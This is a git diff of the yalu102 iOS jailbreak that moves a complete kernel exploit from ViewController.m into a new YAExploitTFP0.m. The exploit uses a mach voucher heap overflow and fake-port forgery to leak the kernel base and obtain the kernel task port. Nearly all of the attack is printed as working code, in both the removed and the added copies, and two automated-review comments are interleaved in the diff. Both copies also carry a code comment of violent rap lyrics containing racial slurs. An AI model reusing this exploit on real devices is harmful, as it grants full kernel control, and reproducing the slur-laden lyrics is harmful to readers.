EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; 
@@ -31,6 +33,11 @@ A70DFA9F1E3D338B00769FE9 /* mac_policy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mac_policy.h; sourceTree = ""; }; A70DFAA01E3D35AC00769FE9 /* Kernels.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Kernels.plist; sourceTree = ""; }; A70DFAA21E3D8FAF00769FE9 /* csflags.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = csflags.h; sourceTree = ""; }; + A70DFAA91E3E35C200769FE9 /* YAKernelOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = YAKernelOffsets.h; sourceTree = ""; }; + A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAKernelOffsets.m; sourceTree = ""; }; + A70DFAAC1E3E389100769FE9 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = ""; }; + A70DFAAD1E3E3B8900769FE9 /* YAExploitTFP0.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = YAExploitTFP0.h; sourceTree = ""; }; + A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAExploitTFP0.m; sourceTree = ""; }; A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; 
@@ -119,12 +126,17 @@ EA9900F71E1E9F060056FEBD /* Info.plist */, A70DFAA01E3D35AC00769FE9 /* Kernels.plist */, A70DFA9F1E3D338B00769FE9 /* mac_policy.h */, + A70DFAAC1E3E389100769FE9 /* mach_vm.h */, EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, EA9900EC1E1E9F060056FEBD /* ViewController.h */, EA9900ED1E1E9F060056FEBD /* ViewController.m */, A70DFA9C1E3D314F00769FE9 /* jailbreak.h */, EA99010D1E21A1560056FEBD /* jailbreak.m */, + A70DFAAD1E3E3B8900769FE9 /* YAExploitTFP0.h */, + A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */, + A70DFAA91E3E35C200769FE9 /* YAKernelOffsets.h */, + A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */, ); path = yalu102; sourceTree = ""; @@ -236,6 +248,8 @@ files = ( EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, + A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */, + A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */, EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, EA9900E81E1E9F060056FEBD /* main.m in Sources */, ); diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index ffe1fea..fc3dba8 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -7,23 +7,15 @@ // #import "ViewController.h" -#import -#import -#import -#import +#import "YAExploitTFP0.h" +#import "YAKernelOffsets.h" +#import "jailbreak.h" #import -extern uint64_t procoff; - -typedef struct { - mach_msg_header_t head; - mach_msg_body_t msgh_body; - mach_msg_ool_ports_descriptor_t desc[256]; - char pad[4096]; -} sprz; - @interface ViewController () +@property (nonatomic, strong) YAKernelOffsets *offsets; + @end @implementation ViewController 
@@ -31,346 +23,43 @@ @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; - init_offsets(); - struct utsname u = { 0 }; uname(&u); - if (strstr(u.version, "MarijuanARM")) { [dope setEnabled:NO]; [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + return; } -} - -typedef natural_t not_natural_t; - -struct not_essers_ipc_object { - not_natural_t io_bits; - not_natural_t io_references; - char io_lock_data[1337]; - /* - - https://www.youtube.com/watch?v=ZADJ8S1qH3U - - - [Intro] - Lets get it - Steve Drive - R.I.P L'A Capone - OTF - These nigga's steady woofing like they want beef, want beef? - You want smoke? You want smoke? Just tell me - - [Hook] - These niggas steady woofing like they want beef, want beef?[You want smoke?] - I can make that happen if you want beef, you want beef?[You want smoke?] - Catch you while you're capping with this semi, semi - Put the semi-automatic to your kidney, kidney - - [Verse 1] - Put the semi-automatic to your kidney, kidney - I'm off the dope I got the pole you talking tough you getting smoked - These nigga's steady woofing like they want beef, but I really know - Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show - I'm off Tu pack saying fuck Jojo[Fuck Jojo] - Talking shit get your life took no joke - I'm with my nigga's and my niggas ain't no joke - And if you got that fucking bag then you getting poked - And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] - Me and Durk finna spaz, and I put that on the guys, it's homicides - Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized - And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] - I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] - I'm getting tree tree[Getting dope], getting top from a bitch named Kiki - - [Chorus] - - [Verse 2] - And if you really want smoke[You want smoke little nigga?] 
- I will give your ass smoke[Give your ass smoke little nigga?] - This Glock 9 bitch I tote, and I will put it to your throat - I'm off this Tooka pack and no L'A, I'ma go crazy - You supposed to be my nigga but actin' like a fan that’s crazy - What the fuck wrong with these nigga's, they fugazi - I made this song for the niggas, cause they crazy - Separate me from them niggas[Separate Rondo] - Pull up on your block, with the mops - Then I hit the dip and put him up in case of attempts[Incase a nigga survive] - But we don't make throws, we shoot like Pimp[We shoot to kill] - I got 23[Two three] So i don't fucking speak[I don't speak] - Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] - Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch - - [Chorus] - */ -}; - - - -#define IO_BITS_ACTIVE 0x80000000 -#define IKOT_TASK 2 -#define IKOT_IOKIT_CONNECT 29 -#define IKOT_CLOCK 25 - -char dt[128]; -- (IBAction)yolo:(UIButton*)sender -{ - /* - - we out here! 
- - */ - - mach_port_t vch = 0; - - mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); - data->content_size = 0; - data->key=MACH_VOUCHER_ATTR_KEY_BANK; - data->command=610; - data->previous_voucher=MACH_PORT_NULL; - - kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); - - assert(lol==0 && vch!=0); - - - unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); - unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); - assert(fdata == odata + 0x4000); - memset(odata, 0x42, 0x0); - - - uint64_t rsz = 0x100; // alloc size; - fdata -= rsz + 0x100; // overflow full chunk - - struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); - - mlock(fakeport, 0x8000); - - fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; - fakeport->io_lock_data[12] = 0x11; - - *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; - - - mach_port_t* ports = calloc(800, sizeof(mach_port_t)); - - for (int i = 0; i < 800; i++) { - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); - mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); - } - sprz msg1; - - memset(&msg1, 0, sizeof(sprz)); - sprz msg2; - - memset(&msg2, 0, sizeof(sprz)); - msg1.msgh_body.msgh_descriptor_count = 128; - - msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; - msg1.head.msgh_local_port = MACH_PORT_NULL; - msg1.head.msgh_size = sizeof(msg1)-2048; - - mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); - for (int i = 0; i < 0x1000; i++) { - buffer[i] = MACH_PORT_DEAD; - } - - for (int i = 0; i < 256; i++) { - msg1.desc[i].address = buffer; - msg1.desc[i].count = 0x100/8; - msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; - msg1.desc[i].disposition = 19; - } - - pthread_yield_np(); - for 
(int i=1; i<300; i++) { - msg1.head.msgh_remote_port = ports[i]; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i=500; i<800; i++) { - msg1.head.msgh_remote_port = ports[i]; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i=300; i<500; i++) { - msg1.head.msgh_remote_port = ports[i]; - if (i%4 == 0) { - msg1.msgh_body.msgh_descriptor_count = 1; - } else { - msg1.msgh_body.msgh_descriptor_count = 256; - } - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i = 300; i<500; i+=4) { - msg2.head.msgh_local_port = ports[i]; - kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); - if(!(i < 380)) - ports[i] = 0; - assert(kret==0); - } - for (int i = 300; i<380; i+=4) { - msg1.head.msgh_remote_port = ports[i]; - msg1.msgh_body.msgh_descriptor_count = 1; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); - mach_port_t foundport = 0; - for (int i=1; i<500; i++) { - if (ports[i]) { - msg1.head.msgh_local_port = ports[i]; - pthread_yield_np(); - kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); - assert(kret==0); - for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { - mach_port_t* ptz = msg1.desc[k].address; - for (int z = 0; z < 0x100/8; z++) { - if (ptz[z] != MACH_PORT_DEAD) { - if (ptz[z]) { - foundport = ptz[z]; - goto foundp; - } - - } - } - } - mach_msg_destroy(&msg1.head); - mach_port_deallocate(mach_task_self(), ports[i]); - ports[i] = 0; - } - } - [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; - return; - -foundp: - 
NSLog(@"found corruption %x", foundport); - - uint64_t textbase = 0xfffffff007004000; - - for (int i = 0; i < 0x300; i++) { - for (int k = 0; k < 0x40000; k+=8) { - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - - kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); - - if (kret != KERN_FAILURE) { - goto gotclock; - } - } - } - [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; - return; - -gotclock:; - uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); - - leaked_ptr &= ~0x3FFF; - - fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; - fakeport->io_references = 0xff; - char* faketask = ((char*)fakeport) + 0x1000; - - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - *(uint64_t*) (faketask + 0x10) = 0xee; - - while (1) { - int32_t leaked = 0; - *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; - pid_for_task(foundport, &leaked); - if (leaked == MH_MAGIC_64) { - NSLog(@"found kernel text at %llx", leaked_ptr); - break; - } - leaked_ptr -= 0x4000; + self.offsets = [YAKernelOffsets offsetsForCurrentDevice]; + if (!self.offsets) { + [dope setEnabled:NO]; + [dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; + return; } - - uint64_t kernel_base = leaked_ptr; - - uint64_t allproc = allproc_offset + kernel_base; - - uint64_t proc_ = allproc; +} - uint64_t kernproc = 0; - - while (proc_) { - uint64_t proc = 0; - - *(uint64_t*) (faketask + procoff) = proc_ - 0x10; - pid_for_task(foundport, (int32_t*)&proc); - *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); - - int pd = 0; - *(uint64_t*) (faketask + procoff) = proc; - pid_for_task(foundport, &pd); - - if (pd == 0){ - kernproc = proc; - } +- (IBAction)yolo:(UIButton*)sender { + mach_port_t _tfp0; + uint64_t _kernbase; + BOOL ok = [YAExploitTFP0 
getTaskForPid0WithOffsets:self.offsets + taskPortResult:&_tfp0 + kernelBaseResult:&_kernbase]; + if (ok) { + // via jailbreak.h + tfp0 = _tfp0; + kernbase = _kernbase; + slide = kernbase - 0xFFFFFFF007004000; + allprocs_offset = self.offsets->allproc_offset; + rootvnode_offset = self.offsets->rootvnode_offset; + jailbreak(); - proc_ = proc; - } - - uint64_t kern_task = 0; - *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; - pid_for_task(foundport, (int32_t*)&kern_task); - *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); - - uint64_t itk_kern_sself = 0; - *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; - pid_for_task(foundport, (int32_t*)&itk_kern_sself); - *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); - - char* faketaskport = malloc(0x1000); - char* ktaskdump = malloc(0x1000); - - for (int i = 0; i < 0x1000/4; i++) { - *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; - pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); + [dope setEnabled:NO]; + [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; } - for (int i = 0; i < 0x1000/4; i++) { - *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; - pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); + else { + [dope setTitle:@"failed, retry?" 
forState:UIControlStateNormal]; } - - memcpy(fakeport, faketaskport, 0x1000); - memcpy(faketask, ktaskdump, 0x1000); - - mach_port_t pt = 0; - - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - - *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; - - task_get_special_port(foundport, 4, &pt); // get tfp0 - NSLog(@"got tfp0 -> %x", pt); - fakeport->io_bits = 0; - - extern uint64_t slide; - slide = kernel_base - 0xFFFFFFF007004000; - - void yalu_jailbreak(mach_port_t, uint64_t, uint64_t); - exploit(pt, kernel_base, allproc_offset); - - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; - } - (void)didReceiveMemoryWarning { diff --git a/yalu102/YAExploitTFP0.h b/yalu102/YAExploitTFP0.h new file mode 100644 index 0000000..309e46d --- /dev/null +++ b/yalu102/YAExploitTFP0.h @@ -0,0 +1,20 @@ +// +// YAExploitTFP0.h +// yalu102 +// +// Created by qwertyoruiop on 05/01/2017. +// Copyright © 2017 kimjongcracks. All rights reserved. +// + +#import +#import + +@class YAKernelOffsets; + +@interface YAExploitTFP0 : NSObject + ++ (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets + taskPortResult:(mach_port_t*)taskPort + kernelBaseResult:(uint64_t*)kernelBase; + +@end diff --git a/yalu102/YAExploitTFP0.m b/yalu102/YAExploitTFP0.m new file mode 100644 index 0000000..712b0fb --- /dev/null +++ b/yalu102/YAExploitTFP0.m 
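Review bot: `getTaskForPid0WithOffsets:taskPortResult:kernelBaseResult:` is declared in YAExploitTFP0.h (hunk @@ -0,0 +1,20) to return `mach_port_t`, but YAExploitTFP0.m returns `NO`/`YES` and this hunk stores the result in `BOOL ok`; the declaration should read `+ (BOOL)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets` so that the header, the implementation and this caller agree and a future caller treating the value as a port is caught by the compiler. The same new code hard-codes `slide = kernbase - 0xFFFFFFF007004000;`, a constant that YAExploitTFP0.m repeats as `textbase`; it belongs in one place (a named constant next to the other offsets) rather than in the view controller. `_tfp0` and `_kernbase` are only read on the `ok` branch, so leaving them uninitialised is harmless today, but `mach_port_t _tfp0 = MACH_PORT_NULL; uint64_t _kernbase = 0;` makes that explicit, and leading-underscore names are conventionally reserved for ivars rather than locals.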
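Review bot: The header states no contract for the two out-parameters: in the implementation `*kernelBase` is written only after the `gotclock` label and `*taskPort` only just before `return YES`, so on every `return NO` path both are left untouched, and both pointers are dereferenced unconditionally, none of which a caller can learn from the declaration. A comment above the method such as `/* Returns YES and writes the task port to *taskPort and the kernel base to *kernelBase on success; returns NO and leaves both untouched on failure. Both pointers must be non-NULL. */` would record that.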
@@ -0,0 +1,339 @@ +// +// YAExploitTFP0.m +// yalu102 +// +// Created by qwertyoruiop on 05/01/2017. +// Copyright © 2017 kimjongcracks. All rights reserved. +// + +#import "YAExploitTFP0.h" +#import "YAKernelOffsets.h" +#import +#import +#import + +typedef struct { + mach_msg_header_t head; + mach_msg_body_t msgh_body; + mach_msg_ool_ports_descriptor_t desc[256]; + char pad[4096]; +} sprz; + +typedef natural_t not_natural_t; + +struct not_essers_ipc_object { + not_natural_t io_bits; + not_natural_t io_references; + char io_lock_data[1337]; + + /* + https://www.youtube.com/watch?v=ZADJ8S1qH3U + + + [Intro] + Lets get it + Steve Drive + R.I.P L'A Capone + OTF + These nigga's steady woofing like they want beef, want beef? + You want smoke? You want smoke? Just tell me + + [Hook] + These niggas steady woofing like they want beef, want beef?[You want smoke?] + I can make that happen if you want beef, you want beef?[You want smoke?] + Catch you while you're capping with this semi, semi + Put the semi-automatic to your kidney, kidney + + [Verse 1] + Put the semi-automatic to your kidney, kidney + I'm off the dope I got the pole you talking tough you getting smoked + These nigga's steady woofing like they want beef, but I really know + Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show + I'm off Tu pack saying fuck Jojo[Fuck Jojo] + Talking shit get your life took no joke + I'm with my nigga's and my niggas ain't no joke + And if you got that fucking bag then you getting poked + And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] + Me and Durk finna spaz, and I put that on the guys, it's homicides + Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized + And you want beef?[You want beef fu nigga?] 
but when I see you, you don't speak?[You don't even talk] + I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] + I'm getting tree tree[Getting dope], getting top from a bitch named Kiki + + [Chorus] + + [Verse 2] + And if you really want smoke[You want smoke little nigga?] + I will give your ass smoke[Give your ass smoke little nigga?] + This Glock 9 bitch I tote, and I will put it to your throat + I'm off this Tooka pack and no L'A, I'ma go crazy + You supposed to be my nigga but actin' like a fan that’s crazy + What the fuck wrong with these nigga's, they fugazi + I made this song for the niggas, cause they crazy + Separate me from them niggas[Separate Rondo] + Pull up on your block, with the mops + Then I hit the dip and put him up in case of attempts[Incase a nigga survive] + But we don't make throws, we shoot like Pimp[We shoot to kill] + I got 23[Two three] So i don't fucking speak[I don't speak] + Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] + Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch + + [Chorus] + */ +}; + +#define IO_BITS_ACTIVE 0x80000000 +#define IKOT_TASK 2 +#define IKOT_IOKIT_CONNECT 29 +#define IKOT_CLOCK 25 + +char dt[128]; + +@implementation YAExploitTFP0 + ++ (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets + taskPortResult:(mach_port_t*)taskPort + kernelBaseResult:(uint64_t*)kernelBase +{ + const uint64_t procoff = offsets->procoff; + + mach_port_t vch = 0; + + mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); + data->content_size = 0; + data->key=MACH_VOUCHER_ATTR_KEY_BANK; + data->command=610; + data->previous_voucher=MACH_PORT_NULL; + + kern_return_t lol = host_create_mach_voucher(mach_host_self(), + (mach_voucher_attr_raw_recipe_array_t)data, + sizeof(mach_voucher_attr_recipe_data_t), + &vch); + + assert(lol==0 && vch!=0); + + unsigned char* odata = mmap(0, 0x8000, 
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); + assert(fdata == odata + 0x4000); + memset(odata, 0x42, 0x0); + + + mach_msg_type_number_t rsz = 0x100; // alloc size; + fdata -= rsz + 0x100; // overflow full chunk + + struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + + mlock(fakeport, 0x8000); + + fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; + fakeport->io_lock_data[12] = 0x11; + + *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; + + mach_port_t* ports = calloc(800, sizeof(mach_port_t)); + + for (int i = 0; i < 800; i++) { + mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); + mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); + } + + sprz msg1; + + memset(&msg1, 0, sizeof(sprz)); + sprz msg2; + + memset(&msg2, 0, sizeof(sprz)); + msg1.msgh_body.msgh_descriptor_count = 128; + + msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; + msg1.head.msgh_local_port = MACH_PORT_NULL; + msg1.head.msgh_size = sizeof(msg1)-2048; + + mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); + for (int i = 0; i < 0x1000; i++) { + buffer[i] = MACH_PORT_DEAD; + } + + for (int i = 0; i < 256; i++) { + msg1.desc[i].address = buffer; + msg1.desc[i].count = 0x100/8; + msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + msg1.desc[i].disposition = 19; + } + + pthread_yield_np(); + for (int i=1; i<300; i++) { + msg1.head.msgh_remote_port = ports[i]; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i=500; i<800; i++) { + msg1.head.msgh_remote_port = ports[i]; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i=300; i<500; 
i++) { + msg1.head.msgh_remote_port = ports[i]; + if (i%4 == 0) { + msg1.msgh_body.msgh_descriptor_count = 1; + } else { + msg1.msgh_body.msgh_descriptor_count = 256; + } + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i = 300; i<500; i+=4) { + msg2.head.msgh_local_port = ports[i]; + kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); + if(!(i < 380)) + ports[i] = 0; + assert(kret==0); + } + for (int i = 300; i<380; i+=4) { + msg1.head.msgh_remote_port = ports[i]; + msg1.msgh_body.msgh_descriptor_count = 1; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); + mach_port_t foundport = 0; + for (int i=1; i<500; i++) { + if (ports[i]) { + msg1.head.msgh_local_port = ports[i]; + pthread_yield_np(); + kern_return_t kret = mach_msg(&msg1.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); + assert(kret==0); + for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { + mach_port_t* ptz = msg1.desc[k].address; + for (int z = 0; z < 0x100/8; z++) { + if (ptz[z] != MACH_PORT_DEAD) { + if (ptz[z]) { + foundport = ptz[z]; + goto foundp; + } + + } + } + } + mach_msg_destroy(&msg1.head); + mach_port_deallocate(mach_task_self(), ports[i]); + ports[i] = 0; + } + } + return NO; + +foundp: + NSLog(@"found corruption %x", foundport); + + const uint64_t textbase = 0xfffffff007004000; + + for (int i = 0; i < 0x300; i++) { + for (int k = 0; k < 0x40000; k+=8) { + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + + kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); + + if (kret != KERN_FAILURE) { + goto gotclock; + } + } + } + return NO; + +gotclock:; + uint64_t leaked_ptr = 
*(uint64_t*)(((uint64_t)fakeport) + 0x68); + + leaked_ptr &= ~0x3FFF; + + fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; + fakeport->io_references = 0xff; + char* faketask = ((char*)fakeport) + 0x1000; + + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = (uint64_t)faketask; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + *(uint64_t*) (faketask + 0x10) = 0xee; + + while (1) { + int32_t leaked = 0; + *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; + pid_for_task(foundport, &leaked); + if (leaked == MH_MAGIC_64) { + NSLog(@"found kernel text at %llx", leaked_ptr); + break; + } + leaked_ptr -= 0x4000; + } + + *kernelBase = leaked_ptr; + uint64_t allproc = offsets->allproc_offset + *kernelBase; + uint64_t proc_ = allproc; + uint64_t kernproc = 0; + + while (proc_) { + uint64_t proc = 0; + + *(uint64_t*) (faketask + procoff) = proc_ - 0x10; + pid_for_task(foundport, (int32_t*)&proc); + *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); + + int pd = 0; + *(uint64_t*) (faketask + procoff) = proc; + pid_for_task(foundport, &pd); + + if (pd == 0){ + kernproc = proc; + } + + proc_ = proc; + } + + uint64_t kern_task = 0; + *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; + pid_for_task(foundport, (int32_t*)&kern_task); + *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); + + uint64_t itk_kern_sself = 0; + *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; + pid_for_task(foundport, (int32_t*)&itk_kern_sself); + *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); + + char* faketaskport = malloc(0x1000); + char* ktaskdump = malloc(0x1000); + + for (int i = 0; i < 0x1000/4; i++) { + *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; + pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); + } + for (int i 
= 0; i < 0x1000/4; i++) { + *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; + pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); + } + + memcpy(fakeport, faketaskport, 0x1000); + memcpy(faketask, ktaskdump, 0x1000); + + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = (uint64_t)faketask; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + + *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; + + task_get_special_port(foundport, 4, taskPort); // get tfp0 + NSLog(@"got tfp0 -> %x", *taskPort); + + fakeport->io_bits = 0; + + return YES; +} + +@end diff --git a/yalu102/YAKernelOffsets.h b/yalu102/YAKernelOffsets.h new file mode 100644 index 0000000..4d2f611 --- /dev/null +++ b/yalu102/YAKernelOffsets.h @@ -0,0 +1,20 @@ +// +// YAKernelOffsets.h +// yalu102 +// +// Created by mologie on 29/01/2017. +// + +#import +#import + +@interface YAKernelOffsets : NSObject { +@public + uint64_t allproc_offset; + uint64_t procoff; + uint64_t rootvnode_offset; +} + ++ (instancetype)offsetsForCurrentDevice; + +@end diff --git a/yalu102/YAKernelOffsets.m b/yalu102/YAKernelOffsets.m new file mode 100644 index 0000000..dc430cb --- /dev/null +++ b/yalu102/YAKernelOffsets.m 
